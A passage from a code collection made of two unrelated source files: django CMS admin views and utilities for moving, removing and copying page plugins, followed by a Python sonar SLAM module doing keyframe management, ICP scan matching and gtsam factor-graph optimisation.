# cancelled before any content was added to plugin
cms_plugin.delete()
context.update({
"deleted":True,
})
return render_to_response('admin/cms/page/plugin_forms_ok.html', context, RequestContext(request))
if not instance:
# instance doesn't exist, call add view
response = plugin_admin.add_view(request)
else:
# already saved before, call change view
# we actually have the instance here, but since i won't override
# change_view method, is better if it will be loaded again, so
# just pass id to plugin_admin
response = plugin_admin.change_view(request, str(plugin_id))
if request.method == "POST" and plugin_admin.object_successfully_changed:
# read the saved object from plugin_admin - ugly but works
saved_object = plugin_admin.saved_object
context = {
'CMS_MEDIA_URL': get_cms_setting('MEDIA_URL'),
'plugin': saved_object,
'is_popup': True,
'name': unicode(saved_object),
"type": saved_object.get_plugin_name(),
'plugin_id': plugin_id,
'icon': force_escape(saved_object.get_instance_icon_src()),
'alt': force_escape(escapejs(saved_object.get_instance_icon_alt())),
}
return render_to_response('admin/cms/page/plugin_forms_ok.html', context, RequestContext(request))
return response
def move_plugin(self, request):
# only allow POST
if request.method != "POST":
return HttpResponse(str("error"))
if 'plugin_id' in request.POST: # single plugin moving
plugin = CMSPlugin.objects.get(pk=int(request.POST['plugin_id']))
if 'placeholder_id' in request.POST:
placeholder = Placeholder.objects.get(pk=int(request.POST['placeholder_id']))
else:
placeholder = plugin.placeholder
# check permissions
if not placeholder.has_change_permission(request):
raise Http404
# plugin positions are 0 based, so just using count here should give us 'last_position + 1'
position = CMSPlugin.objects.filter(placeholder=placeholder).count()
plugin.placeholder = placeholder
plugin.position = position
plugin.save()
pos = 0
if 'ids' in request.POST: # multiple plugins/ reordering
whitelisted_placeholders = []
for id in request.POST['ids'].split("_"):
plugin = CMSPlugin.objects.get(pk=id)
# check the permissions for *each* plugin, but cache them locally
# per placeholder
if plugin.placeholder.pk not in whitelisted_placeholders:
if plugin.placeholder.has_change_permission(request):
whitelisted_placeholders.append(plugin.placeholder.pk)
else:
raise Http404
# actually do the moving
if plugin.position != pos:
plugin.position = pos
plugin.save()
pos += 1
else:
HttpResponse(str("error"))
return HttpResponse(str("ok"))
def remove_plugin(self, request):
if request.method != "POST": # only allow POST
raise Http404
plugin_id = request.POST['plugin_id']
plugin = get_object_or_404(CMSPlugin, pk=plugin_id)
# check the permissions!
if not plugin.placeholder.has_delete_permission(request):
return HttpResponseForbidden(_("You don't have permission to delete a plugin"))
plugin.delete_with_public()
plugin_name = unicode(plugin_pool.get_plugin(plugin.plugin_type).name)
comment = _(u"%(plugin_name)s plugin at position %(position)s in %(placeholder)s was deleted.") % {'plugin_name':plugin_name, 'position':plugin.position, 'placeholder':plugin.placeholder}
return HttpResponse("%s,%s" % (plugin_id, comment))
def copy_plugins(self, request):
# only allow POST
if request.method != "POST":
raise Http404
placeholder_id = request.POST['placeholder']
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
# check permissions
if not placeholder.has_add_permission(request):
raise Http404
# the placeholder actions are responsible for copying, they should return
# a list of plugins if successful.
plugins = placeholder.actions.copy(
target_placeholder=placeholder,
source_language=request.POST['copy_from'],
target_language=get_language_from_request(request),
fieldname=placeholder._get_attached_field_name(),
model=placeholder._get_attached_model(),
)
if plugins:
return render_to_response('admin/cms/page/widgets/plugin_item.html',
{'plugin_list': list(plugins)}, RequestContext(request))
else:
return HttpResponseBadRequest("Error during copy")
```
#### File: cms/utils/__init__.py
```python
from cms import constants
from cms.utils.conf import get_cms_setting
from cms.utils.i18n import get_default_language, get_language_list
from distutils.version import LooseVersion
from django.conf import settings
from django.core.files.storage import get_storage_class
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.functional import LazyObject
import django
import os
import urllib
def get_template_from_request(request, obj=None, no_current_page=False):
"""
Gets a valid template from different sources or falls back to the default
template.
"""
template = None
if len(get_cms_setting('TEMPLATES')) == 1:
return get_cms_setting('TEMPLATES')[0][0]
if "template" in request.REQUEST:
template = request.REQUEST['template']
if not template and obj is not None:
template = obj.get_template()
if not template and not no_current_page and hasattr(request, "current_page"):
current_page = request.current_page
if hasattr(current_page, "get_template"):
template = current_page.get_template()
if template is not None and template in dict(get_cms_setting('TEMPLATES')).keys():
if template == constants.TEMPLATE_INHERITANCE_MAGIC and obj:
# Happens on admin's request when changing the template for a page
# to "inherit".
return obj.get_template()
return template
return get_cms_setting('TEMPLATES')[0][0]
def get_language_from_request(request, current_page=None):
"""
Return the most obvious language according the request
"""
language = request.REQUEST.get('language', None)
site_id = current_page.site_id if current_page else None
if language:
if not language in get_language_list(site_id):
language = None
if language is None:
language = getattr(request, 'LANGUAGE_CODE', None)
if language:
if not language in get_language_list(site_id):
language = None
if language is None and current_page:
# in last resort, get the first language available in the page
languages = current_page.get_languages()
if len(languages) > 0:
language = languages[0]
if language is None:
# language must be defined in CMS_LANGUAGES, so check first if there
# is any language with LANGUAGE_CODE, otherwise try to split it and find
# best match
language = get_default_language(site_id=site_id)
return language
def get_page_from_request(request):
from warnings import warn
from cms.utils.page_resolver import get_page_from_request as new
warn("'cms.utils.get_page_from_request' is deprecated in favor of "
"'cms.utils.page_resolver.get_page_from_request' and will be removed "
"in Django-CMS 2.2.", DeprecationWarning)
return new(request)
"""
The following class is taken from https://github.com/jezdez/django/compare/feature/staticfiles-templatetag
and should be removed and replaced by the django-core version in 1.4
"""
default_storage = 'django.contrib.staticfiles.storage.StaticFilesStorage'
if LooseVersion(django.get_version()) < LooseVersion('1.3'):
default_storage = 'staticfiles.storage.StaticFilesStorage'
class ConfiguredStorage(LazyObject):
def _setup(self):
self._wrapped = get_storage_class(getattr(settings, 'STATICFILES_STORAGE', default_storage))()
configured_storage = ConfiguredStorage()
def cms_static_url(path):
'''
Helper that prefixes a URL with STATIC_URL and cms
'''
if not path:
return ''
return configured_storage.url(os.path.join('cms', path))
``` |
{
"source": "jinkunw/bruce",
"score": 2
} |
#### File: src/bruce_slam/slam.py
```python
import matplotlib
matplotlib.use("Agg")
from itertools import combinations
from collections import defaultdict
from enum import Enum
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial.ckdtree import cKDTree as KDTree
from scipy.optimize import shgo
from sklearn.covariance import MinCovDet
import gtsam
from .sonar import OculusProperty
from .utils.conversions import *
from .utils.visualization import *
from .utils.io import *
from . import pcl
class STATUS(Enum):
NOT_ENOUGH_POINTS = "Not enough points"
LARGE_TRANSFORMATION = "Large transformation"
NOT_ENOUGH_OVERLAP = "Not enough overlap"
NOT_CONVERGED = "Not converged"
INITIALIZATION_FAILURE = "Initialization failure"
SUCCESS = "Success"
def __init__(self, *args, **kwargs):
Enum.__init__(*args, **kwargs)
self.description = None
def __bool__(self):
return self == STATUS.SUCCESS
def __nonzero__(self):
return self == STATUS.SUCCESS
def __str__(self):
if self.description:
return self.value + ": " + self.description
else:
return self.value
class Keyframe(object):
def __init__(
self, status, time, dr_pose3, points=np.zeros((0, 2), np.float32), cov=None
):
self.status = status # used to mark keyframe
self.time = time # time
self.dr_pose3 = dr_pose3 # dead reckoning 3d pose
self.dr_pose = pose322(dr_pose3) # dead reckoning 2d pose
self.pose3 = dr_pose3 # estimated 3d pose (will be updated later)
self.pose = pose322(dr_pose3) # estimated 2d pose
self.cov = cov # cov in local frame (always 2d)
self.transf_cov = None # cov in global frame
self.points = points.astype(np.float32) # points in local frame (always 2d)
self.transf_points = None # transformed points in global frame based on pose
self.constraints = [] # Non-sequential constraints (key, odom)
self.twist = None # twist message for publishing odom
def update(self, new_pose, new_cov=None):
self.pose = new_pose
self.pose3 = n2g(
(
new_pose.x(),
new_pose.y(),
self.dr_pose3.translation().z(),
self.dr_pose3.rotation().roll(),
self.dr_pose3.rotation().pitch(),
new_pose.theta(),
),
"Pose3",
)
self.transf_points = Keyframe.transform_points(self.points, self.pose)
if new_cov is not None:
self.cov = new_cov
if self.cov is not None:
c, s = np.cos(self.pose.theta()), np.sin(self.pose.theta())
R = np.array([[c, -s], [s, c]])
self.transf_cov = np.array(self.cov)
self.transf_cov[:2, :2] = R.dot(self.transf_cov[:2, :2]).dot(R.T)
self.transf_cov[:2, 2] = R.dot(self.transf_cov[:2, 2])
self.transf_cov[2, :2] = self.transf_cov[2, :2].dot(R.T)
@staticmethod
def transform_points(points, pose):
if len(points) == 0:
return np.empty_like(points, np.float32)
T = pose.matrix().astype(np.float32)
return points.dot(T[:2, :2].T) + T[:2, 2]
class InitializationResult(object):
def __init__(self):
# all points are in local frame
self.source_points = np.zeros((0, 2))
self.target_points = np.zeros((0, 2))
self.source_key = None
self.target_key = None
self.source_pose = None
self.target_pose = None
# Cov for sampling
self.cov = None
self.occ = None
self.status = None
self.estimated_source_pose = None
self.source_pose_samples = None
def plot(self, title):
# fmt: off
plt.figure()
# Plot in global frame
points = Keyframe.transform_points(self.target_points, self.target_pose)
plt.plot(points[:, 0], points[:, 1], "k.", ms=1, label="target points")
plt.plot(self.source_pose.x(), self.source_pose.y(), "r+", ms=10)
points = Keyframe.transform_points(self.source_points, self.source_pose)
plt.plot(points[:, 0], points[:, 1], "r.", ms=1, label="source points (guess)")
if self.cov is not None:
c, s = np.cos(self.source_pose.theta()), np.sin(self.source_pose.theta())
R = np.array([[c, -s], [s, c]])
cov = R.dot(self.cov[:2, :2]).dot(R.T)
plot_cov_ellipse((self.source_pose.x(), self.source_pose.y()), cov, nstd=3, fill=False, color="r")
if self.estimated_source_pose is not None:
plt.plot(self.estimated_source_pose.x(), self.estimated_source_pose.y(), "g+", ms=10)
points = Keyframe.transform_points(self.source_points, self.estimated_source_pose)
plt.plot(points[:, 0], points[:, 1], "g.", ms=1, label="source points (initialized)")
if self.source_pose_samples is not None:
poses = np.array(self.source_pose_samples)
plt.scatter(poses[:, 0], poses[:, 1], c=poses[:, 3], s=1, label="pose samples")
plt.colorbar()
if self.occ:
x0, y0, resolution, occ_arr = self.occ
x1 = x0 + (occ_arr.shape[1] - 0.5) * resolution
y1 = y0 + (occ_arr.shape[0] - 0.5) * resolution
plt.imshow(occ_arr, origin='upper', extent=(x0, x1, y1, y0), cmap='Greys', vmin=0, vmax=1, alpha=0.5)
plt.colorbar()
plt.legend()
plt.gca().invert_yaxis()
plt.axis("equal")
plt.title(str(self.status))
plt.savefig(title, dpi=100)
plt.close("all")
# fmt: on
def save(self, filename):
np.savez(
filename,
source_points=self.source_points,
target_points=self.target_points,
source_pose=g2n(self.source_pose),
target_pose=g2n(self.target_pose),
estimated_source_pose=g2n(self.estimated_source_pose),
)
class ICPResult(object):
def __init__(self, init_ret, use_samples=False, sample_eps=0.01):
# all points are in local frame
self.source_points = init_ret.source_points
self.target_points = init_ret.target_points
self.source_key = init_ret.source_key
self.target_key = init_ret.target_key
self.source_pose = init_ret.source_pose
self.target_pose = init_ret.target_pose
self.status = init_ret.status
if init_ret.estimated_source_pose is not None:
self.initial_transform = self.target_pose.between(
init_ret.estimated_source_pose
)
else:
self.initial_transform = self.target_pose.between(self.source_pose)
self.estimated_transform = None
# Cov derived from ICP
self.cov = None
self.initial_transforms = None
if use_samples and init_ret.source_pose_samples is not None:
idx = np.argsort(init_ret.source_pose_samples[:, -1])
transforms = [
self.target_pose.between(n2g(g, "Pose2"))
for g in init_ret.source_pose_samples[idx, :3]
]
filtered = [transforms[0]]
for b in transforms[1:]:
d = np.linalg.norm(g2n(filtered[-1].between(b)))
if d < sample_eps:
continue
else:
filtered.append(b)
self.initial_transforms = filtered
self.sample_transforms = None
# Whether the result is inserted to factor graph
self.inserted = False
def plot(self, title):
# fmt: off
plt.figure()
# Plot in target frame
plt.plot(self.target_points[:, 0], self.target_points[:, 1], "k.", ms=1, label="target points")
plt.plot(self.initial_transform.x(), self.initial_transform.y(), "r+", ms=10)
points = Keyframe.transform_points(self.source_points, self.initial_transform)
plt.plot(points[:, 0], points[:, 1], "r.", ms=1, label="source points (guess)")
if self.estimated_transform is not None:
plt.plot(self.estimated_transform.x(), self.estimated_transform.y(), "g+", ms=10)
points = Keyframe.transform_points(self.source_points, self.estimated_transform)
plt.plot(points[:, 0], points[:, 1], "g.", ms=1, label="source points (estimated)")
if self.cov is not None:
cov = self.cov[:2, :2]
c, s = np.cos(self.estimated_transform.theta()), np.sin(self.estimated_transform.theta())
R = np.array([[c, -s], [s, c]])
cov = R.dot(cov).dot(R.T)
plot_cov_ellipse((self.estimated_transform.x(), self.estimated_transform.y()), cov, nstd=3, color="g", fill=False)
if self.sample_transforms is not None:
plt.scatter(self.sample_transforms[:, 0], self.sample_transforms[:, 1], color='c', s=1, label="sample estimate")
plt.legend()
plt.axis("equal")
plt.gca().invert_yaxis()
plt.title(str(self.status))
plt.savefig(title, dpi=100)
plt.close("all")
# fmt: on
def save(self, filename):
np.savez(
filename,
source_points=self.source_points,
target_points=self.target_points,
source_pose=g2n(self.source_pose),
target_pose=g2n(self.target_pose),
initial_transform=g2n(self.initial_transform),
estimated_transform=g2n(self.estimated_transform),
cov=self.cov,
)
class SMParams(object):
def __init__(self):
# Use occupancy probability map matching to initialize ICP
self.initialization = None
# Global search params
self.initialization_params = None
# Minimum number of points
self.min_points = None
# Max deviation from initial guess
self.max_translation = None
self.max_rotation = None
# Min separation between source key and the last target frame
self.min_st_sep = None
# Number of source frames to build source points
# Not used in SSM
self.source_frames = None
# Number of target frames to build target points
# Not used in NSSM
self.target_frames = None
# Number of ICP instances to run to calculate cov
self.cov_samples = None
class SLAM(object):
def __init__(self):
self.oculus = OculusProperty()
# Create a new factor when
# - |ti - tj| > min_duration and
# - |xi - xj| > max_translation or
# - |ri - rj| > max_rotation
self.keyframe_duration = None
self.keyframe_translation = None
self.keyframe_rotation = None
# List of keyframes
self.keyframes = []
# Current (non-key)frame with real-time pose update
# FIXME propagate cov from previous keyframe
self.current_frame = None
self.isam_params = gtsam.ISAM2Params()
self.graph = gtsam.NonlinearFactorGraph()
self.values = gtsam.Values()
# [x, y, theta]
self.prior_sigmas = None
# Noise model without ICP
# [x, y, theta]
self.odom_sigmas = None
# Downsample point cloud for ICP and publishing
self.point_resolution = 0.5
# Noise radius in overlap
self.point_noise = 0.5
self.ssm_params = SMParams()
self.ssm_params.initialization = True
self.ssm_params.initialization_params = 50, 1, 0.01
self.ssm_params.min_st_sep = 1
self.ssm_params.min_points = 50
self.ssm_params.max_translation = 2.0
self.ssm_params.max_rotation = np.pi / 6
self.ssm_params.target_frames = 3
# Don't use ICP covariance
self.ssm_params.cov_samples = 0
self.nssm_params = SMParams()
self.nssm_params.initialization = True
self.nssm_params.initialization_params = 100, 5, 0.01
self.nssm_params.min_st_sep = 10
self.nssm_params.min_points = 100
self.nssm_params.max_translation = 6.0
self.nssm_params.max_rotation = np.pi / 2
self.nssm_params.source_frames = 5
self.nssm_params.cov_samples = 30
self.icp = pcl.ICP()
# Pairwise consistent measurement
self.nssm_queue = []
self.pcm_queue_size = 5
self.min_pcm = 3
# Use fixed noise model in two cases
# - Sequential scan matching
# - ICP cov is too small in non-sequential scan matching
# [x, y, theta]
self.icp_odom_sigmas = None
# FIXME Can't save fig in online mode
self.save_fig = False
self.save_data = False
@property
def current_keyframe(self):
return self.keyframes[-1]
@property
def current_key(self):
return len(self.keyframes)
def configure(self):
assert (
self.nssm_params.cov_samples == 0
or self.nssm_params.cov_samples
< self.nssm_params.initialization_params[0]
* self.nssm_params.initialization_params[1]
)
assert (
self.ssm_params.cov_samples == 0
or self.ssm_params.cov_samples
< self.ssm_params.initialization_params[0]
* self.ssm_params.initialization_params[1]
)
assert self.nssm_params.source_frames < self.nssm_params.min_st_sep
self.prior_model = self.create_noise_model(self.prior_sigmas)
self.odom_model = self.create_noise_model(self.odom_sigmas)
self.icp_odom_model = self.create_noise_model(self.icp_odom_sigmas)
self.isam = gtsam.ISAM2(self.isam_params)
def get_states(self):
"""
Retrieve all states as array which are represented as
[time, pose2, dr_pose3, cov]
- pose2: [x, y, yaw]
- dr_pose3: [x, y, z, roll, pitch, yaw]
- cov: 3 x 3
"""
states = np.zeros(
self.current_key,
dtype=[
("time", np.float64),
("pose", np.float32, 3),
("dr_pose3", np.float32, 6),
("cov", np.float32, 9),
],
)
# Update all
values = self.isam.calculateEstimate()
for key in range(self.current_key):
pose = values.atPose2(X(key))
cov = self.isam.marginalCovariance(X(key))
self.keyframes[key].update(pose, cov)
t0 = self.keyframes[0].time
for key in range(self.current_key):
keyframe = self.keyframes[key]
states[key]["time"] = (keyframe.time - t0).to_sec()
states[key]["pose"] = g2n(keyframe.pose)
states[key]["dr_pose3"] = g2n(keyframe.dr_pose3)
states[key]["cov"] = keyframe.transf_cov.ravel()
return states
@staticmethod
def sample_pose(pose, covariance):
delta = np.random.multivariate_normal(np.zeros(3), covariance)
return pose.compose(n2g(delta, "Pose2"))
def sample_current_pose(self):
return self.sample_pose(self.current_keyframe.pose, self.current_keyframe.cov)
def get_points(self, frames=None, ref_frame=None, return_keys=False):
"""
- Accumulate points in frames
- Transform them to reference frame
- Downsample points
- Return the corresponding keys for every point
"""
if frames is None:
frames = range(self.current_key)
if ref_frame is not None:
if isinstance(ref_frame, gtsam.Pose2):
ref_pose = ref_frame
else:
ref_pose = self.keyframes[ref_frame].pose
# Add empty point in case all points are empty
if return_keys:
all_points = [np.zeros((0, 3), np.float32)]
else:
all_points = [np.zeros((0, 2), np.float32)]
for key in frames:
if ref_frame is not None:
points = self.keyframes[key].points
pose = self.keyframes[key].pose
transf = ref_pose.between(pose)
transf_points = Keyframe.transform_points(points, transf)
else:
transf_points = self.keyframes[key].transf_points
if return_keys:
transf_points = np.c_[
transf_points, key * np.ones((len(transf_points), 1))
]
all_points.append(transf_points)
all_points = np.concatenate(all_points)
if return_keys:
return pcl.downsample(
all_points[:, :2], all_points[:, (2,)], self.point_resolution
)
else:
return pcl.downsample(all_points, self.point_resolution)
def compute_icp(self, source_points, target_points, guess=gtsam.Pose2()):
source_points = np.array(source_points, np.float32)
target_points = np.array(target_points, np.float32)
guess = guess.matrix()
message, T = self.icp.compute(source_points, target_points, guess)
# ICP covariance is too small
# cov = self.icp.getCovariance()
x, y = T[:2, 2]
theta = np.arctan2(T[1, 0], T[0, 0])
return message, gtsam.Pose2(x, y, theta)
def compute_icp_with_cov(self, source_points, target_points, guesses):
"""
guesses: list of initial samples
"""
source_points = np.array(source_points, np.float32)
target_points = np.array(target_points, np.float32)
sample_transforms = []
for g in guesses:
g = g.matrix()
message, T = self.icp.compute(source_points, target_points, g)
if message == "success":
x, y = T[:2, 2]
theta = np.arctan2(T[1, 0], T[0, 0])
sample_transforms.append((x, y, theta))
sample_transforms = np.array(sample_transforms)
if len(sample_transforms) < 5:
return "Too few samples for covariance computation", None, None, None
# Can't use np.cov(). Too many outliers
try:
fcov = MinCovDet(False, support_fraction=0.8).fit(sample_transforms)
except ValueError as e:
return "Failed to calculate covariance", None, None, None
m = n2g(fcov.location_, "Pose2")
cov = fcov.covariance_
# unrotate to local frame
R = m.rotation().matrix()
cov[:2, :] = R.T.dot(cov[:2, :])
cov[:, :2] = cov[:, :2].dot(R)
default_cov = np.diag(self.icp_odom_sigmas) ** 2
if np.linalg.det(cov) < np.linalg.det(default_cov):
cov = default_cov
return "success", m, cov, sample_transforms
def get_overlap(
self,
source_points,
target_points,
source_pose=None,
target_pose=None,
return_indices=False,
):
if source_pose:
source_points = Keyframe.transform_points(source_points, source_pose)
if target_pose:
target_points = Keyframe.transform_points(target_points, target_pose)
indices, dists = pcl.match(target_points, source_points, 1, self.point_noise)
if return_indices:
return np.sum(indices != -1), indices
else:
return np.sum(indices != -1)
def add_prior(self, keyframe):
# pose = gtsam.Pose2()
pose = keyframe.pose
factor = gtsam.PriorFactorPose2(X(0), pose, self.prior_model)
self.graph.add(factor)
self.values.insert(X(0), pose)
def add_odometry(self, keyframe):
dt = (keyframe.time - self.keyframes[-1].time).to_sec()
dr_odom = self.keyframes[-1].pose.between(keyframe.pose)
factor = gtsam.BetweenFactorPose2(
X(self.current_key - 1), X(self.current_key), dr_odom, self.odom_model
)
self.graph.add(factor)
self.values.insert(X(self.current_key), keyframe.pose)
def get_map(self, frames, resolution=None):
# Implemented in slam_node
raise NotImplementedError
def get_matching_cost_subroutine1(
self,
source_points,
source_pose,
target_points,
target_pose,
source_pose_cov=None,
):
"""
Cost = - sum_i log p_i(Tx s_i \in S | t_i \in T),
given transform Tx, source points S, target points T
/ - prob_tp if there exists ||Tx s_i - t_i|| < sigma,
p_i(z_i | T) = |
\ - prob_fp otherwise
"""
# pose_samples = []
# target_tree = KDTree(target_points)
# def subroutine(x):
# # x = [x, y, theta]
# delta = n2g(x, "Pose2")
# sample_source_pose = source_pose.compose(delta)
# sample_transform = target_pose.between(sample_source_pose)
# points = Keyframe.transform_points(source_points, sample_transform)
# dists, indices = target_tree.query(
# points, distance_upper_bound=self.point_noise
# )
# cost = -np.sum(indices != len(target_tree.data))
# pose_samples.append(np.r_[g2n(sample_source_pose), cost])
# return cost
# return subroutine, pose_samples
pose_samples = []
xmin, ymin = np.min(target_points, axis=0) - 2 * self.point_noise
xmax, ymax = np.max(target_points, axis=0) + 2 * self.point_noise
resolution = self.point_noise / 10.0
xs = np.arange(xmin, xmax, resolution)
ys = np.arange(ymin, ymax, resolution)
target_grids = np.zeros((len(ys), len(xs)), np.uint8)
r = np.int32(np.round((target_points[:, 1] - ymin) / resolution))
c = np.int32(np.round((target_points[:, 0] - xmin) / resolution))
r = np.clip(r, 0, target_grids.shape[0] - 1)
c = np.clip(c, 0, target_grids.shape[1] - 1)
target_grids[r, c] = 255
dilate_hs = int(np.ceil(self.point_noise / resolution))
dilate_size = 2 * dilate_hs + 1
kernel = cv2.getStructuringElement(
cv2.MORPH_ELLIPSE, (dilate_size, dilate_size), (dilate_hs, dilate_hs)
)
target_grids = cv2.dilate(target_grids, kernel)
# # Calculate distance to the nearest points
# target_grids = cv2.bitwise_not(target_grids)
# target_grids = cv2.distanceTransform(target_grids, cv2.DIST_L2, 3)
# target_grids = 1.0 - 0.2 * target_grids / self.point_noise
# target_grids = np.clip(target_grids, 0.2, 1.0)
source_pose_info = np.linalg.inv(source_pose_cov)
def subroutine(x):
# x = [x, y, theta]
delta = n2g(x, "Pose2")
sample_source_pose = source_pose.compose(delta)
sample_transform = target_pose.between(sample_source_pose)
points = Keyframe.transform_points(source_points, sample_transform)
r = np.int32(np.round((points[:, 1] - ymin) / resolution))
c = np.int32(np.round((points[:, 0] - xmin) / resolution))
inside = (
(0 <= r)
& (r < target_grids.shape[0])
& (0 <= c)
& (c < target_grids.shape[1])
)
cost = -np.sum(target_grids[r[inside], c[inside]] > 0)
pose_samples.append(np.r_[g2n(sample_source_pose), cost])
return cost
return subroutine, pose_samples
def get_matching_cost_subroutine2(self, source_points, source_pose, occ):
"""
Ceres scan matching
Cost = - sum_i ||1 - M_nearest(Tx s_i)||^2,
given transform Tx, source points S, occupancy map M
"""
pose_samples = []
x0, y0, resolution, occ_arr = occ
def subroutine(x):
# x = [x, y, theta]
delta = n2g(x, "Pose2")
sample_pose = source_pose.compose(delta)
xy = Keyframe.transform_points(source_points, sample_pose)
r = np.int32(np.round((xy[:, 1] - y0) / resolution))
c = np.int32(np.round((xy[:, 0] - x0) / resolution))
sel = (r >= 0) & (c >= 0) & (r < occ_arr.shape[0]) & (c < occ_arr.shape[1])
hit_probs_inside_map = occ_arr[r[sel], c[sel]]
num_hits_outside_map = len(xy) - np.sum(sel)
cost = (
np.sum((1.0 - hit_probs_inside_map) ** 2)
+ num_hits_outside_map * (1.0 - 0.5) ** 2
)
cost = np.sqrt(cost / len(source_points))
pose_samples.append(np.r_[g2n(sample_pose), cost])
return cost
return subroutine, pose_samples
#######################################################
# TODO Merge SSM and NSSM together
#######################################################
def initialize_sequential_scan_matching(self, keyframe):
ret = InitializationResult()
ret.status = STATUS.SUCCESS
ret.status.description = None
# Match current keyframe to previous k frames
ret.source_key = self.current_key
ret.target_key = self.current_key - 1
ret.source_pose = keyframe.pose
ret.target_pose = self.current_keyframe.pose
# Accumulate reference points from previous k frames
ret.source_points = keyframe.points
target_frames = range(self.current_key)[-self.ssm_params.target_frames :]
ret.target_points = self.get_points(target_frames, ret.target_key)
ret.cov = np.diag(self.odom_sigmas)
if len(ret.source_points) < self.ssm_params.min_points:
ret.status = STATUS.NOT_ENOUGH_POINTS
ret.status.description = "source points {}".format(len(ret.source_points))
return ret
if len(ret.target_points) < self.ssm_params.min_points:
ret.status = STATUS.NOT_ENOUGH_POINTS
ret.status.description = "target points {}".format(len(ret.target_points))
return ret
if not self.ssm_params.initialization:
return ret
with CodeTimer("SLAM - sequential scan matching - sampling"):
pose_stds = np.array([self.odom_sigmas]).T
pose_bounds = 5.0 * np.c_[-pose_stds, pose_stds]
# ret.occ = self.get_map(target_frames)
# subroutine, pose_samples = self.get_matching_cost_subroutine2(
# ret.source_points,
# ret.source_pose,
# ret.occ,
# )
subroutine, pose_samples = self.get_matching_cost_subroutine1(
ret.source_points,
ret.source_pose,
ret.target_points,
ret.target_pose,
ret.cov,
)
result = shgo(
func=subroutine,
bounds=pose_bounds,
n=self.ssm_params.initialization_params[0],
iters=self.ssm_params.initialization_params[1],
sampling_method="sobol",
minimizer_kwargs={
"options": {"ftol": self.ssm_params.initialization_params[2]}
},
)
if result.success:
ret.source_pose_samples = np.array(pose_samples)
ret.estimated_source_pose = ret.source_pose.compose(n2g(result.x, "Pose2"))
ret.status.description = "matching cost {:.2f}".format(result.fun)
if self.save_data:
ret.save("step-{}-ssm-sampling.npz".format(self.current_key))
else:
ret.status = STATUS.INITIALIZATION_FAILURE
ret.status.description = result.message
return ret
def add_sequential_scan_matching(self, keyframe):
"""
Add sequential scan matching factor.
kf[t - k] -- ... -- kf[t - 2] -- kf[t - 1] -- kf[t]
|_________|________|_____________| |
target points in kf[t - 1] source points
"""
ret = self.initialize_sequential_scan_matching(keyframe)
if self.save_fig:
ret.plot("step-{}-ssm-sampling.png".format(self.current_key))
if not ret.status:
self.add_odometry(keyframe)
return
ret2 = ICPResult(ret, self.ssm_params.cov_samples > 0)
# Compute ICP here with a timer
with CodeTimer("SLAM - sequential scan matching - ICP"):
if self.ssm_params.initialization and self.ssm_params.cov_samples > 0:
message, odom, cov, sample_transforms = self.compute_icp_with_cov(
ret2.source_points,
ret2.target_points,
ret2.initial_transforms[: self.ssm_params.cov_samples],
)
if message != "success":
ret2.status = STATUS.NOT_CONVERGED
ret2.status.description = message
else:
ret2.estimated_transform = odom
ret2.cov = cov
ret2.sample_transforms = sample_transforms
ret2.status.description = "{} samples".format(
len(ret2.sample_transforms)
)
else:
message, odom = self.compute_icp(
ret2.source_points, ret2.target_points, ret2.initial_transform
)
if message != "success":
ret2.status = STATUS.NOT_CONVERGED
ret2.status.description = message
else:
ret2.estimated_transform = odom
ret2.status.description = ""
# Add some failure detections
# The transformation compared to dead reckoning can't be too large
if ret2.status:
delta = ret2.initial_transform.between(ret2.estimated_transform)
delta_translation = delta.translation().norm()
delta_rotation = abs(delta.theta())
if (
delta_translation > self.ssm_params.max_translation
or delta_rotation > self.ssm_params.max_rotation
):
ret2.status = STATUS.LARGE_TRANSFORMATION
ret2.status.description = "trans {:.2f} rot {:.2f}".format(
delta_translation, delta_rotation
)
# There must be enough overlap between two point clouds.
if ret2.status:
overlap = self.get_overlap(
ret2.source_points, ret2.target_points, ret2.estimated_transform
)
if overlap < self.ssm_params.min_points:
ret2.status = STATUS.NOT_ENOUGH_OVERLAP
ret2.status.description = "overlap {}".format(overlap)
if ret2.status:
if ret2.cov is not None:
icp_odom_model = self.create_full_noise_model(ret2.cov)
else:
icp_odom_model = self.icp_odom_model
factor = gtsam.BetweenFactorPose2(
X(ret2.target_key),
X(ret2.source_key),
ret2.estimated_transform,
icp_odom_model,
)
self.graph.add(factor)
self.values.insert(
X(ret2.source_key), ret2.target_pose.compose(ret2.estimated_transform)
)
ret2.inserted = True
if self.save_data:
ret2.save("step-{}-ssm-icp.npz".format(self.current_key))
else:
self.add_odometry(keyframe)
if self.save_fig:
ret2.plot("step-{}-ssm-icp.png".format(self.current_key))
def initialize_nonsequential_scan_matching(self):
ret = InitializationResult()
ret.status = STATUS.SUCCESS
ret.status.description = None
ret.source_key = self.current_key - 1
ret.source_pose = self.current_frame.pose
ret.estimated_source_pose = ret.source_pose
source_frames = range(
ret.source_key, ret.source_key - self.nssm_params.source_frames, -1
)
ret.source_points = self.get_points(source_frames, ret.source_key)
if len(ret.source_points) < self.nssm_params.min_points:
ret.status = STATUS.NOT_ENOUGH_POINTS
ret.status.description = "source points {}".format(len(ret.source_points))
return ret
# Find target points for matching
# Limit searching keyframes
target_frames = range(self.current_key - self.nssm_params.min_st_sep)
# Target points in global frame
target_points, target_keys = self.get_points(target_frames, None, True)
# Further limit points based on source pose uncertainty
sel = np.zeros(len(target_points), np.bool)
for source_frame in source_frames:
pose = self.keyframes[source_frame].pose
cov = self.keyframes[source_frame].cov
translation_std = np.sqrt(np.max(np.linalg.eigvals(cov[:2, :2])))
rotation_std = np.sqrt(cov[2, 2])
range_bound = translation_std * 5.0 + self.oculus.max_range
bearing_bound = rotation_std * 5.0 + self.oculus.horizontal_aperture * 0.5
local_points = Keyframe.transform_points(target_points, pose.inverse())
ranges = np.linalg.norm(local_points, axis=1)
bearings = np.arctan2(local_points[:, 1], local_points[:, 0])
sel_i = (ranges < range_bound) & (abs(bearings) < bearing_bound)
sel |= sel_i
target_points = target_points[sel]
target_keys = target_keys[sel]
target_frames, counts = np.unique(np.int32(target_keys), return_counts=True)
target_frames = target_frames[counts > 10]
counts = counts[counts > 10]
if len(target_frames) == 0 or len(target_points) < self.nssm_params.min_points:
ret.status = STATUS.NOT_ENOUGH_POINTS
ret.status.description = "target points {}".format(len(target_points))
return ret
ret.target_key = target_frames[np.argmax(counts)]
ret.target_pose = self.keyframes[ret.target_key].pose
ret.target_points = Keyframe.transform_points(
